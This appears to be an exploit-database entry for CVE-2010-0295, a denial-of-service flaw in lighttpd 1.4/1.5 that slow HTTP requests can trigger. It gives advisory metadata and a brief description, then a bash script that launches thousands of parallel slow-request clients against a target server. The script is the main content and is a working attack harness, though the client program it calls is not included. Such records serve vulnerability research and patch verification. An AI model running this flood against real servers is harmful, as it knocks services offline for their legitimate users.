lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service

Author: Li Ming
type: dos
platform: linux
port: 
date_added: 2010-02-02 
date_updated: 2014-06-01 
verified: 1 
codes: CVE-2010-0295;OSVDB-62068 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/38036/info

The 'lighttpd' webserver is prone to a denial-of-service vulnerability.

Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.

##slow_test.sh
for ((j=0;j<1000;j++)) do
  for ((i=0; i<50; i++)) do
  ## slow_client is a C program which sends a HTTP request very slowly
    ./slow_client http://www.example.com/>/dev/null 2>/dev/null &
  done&
  sleep 3
done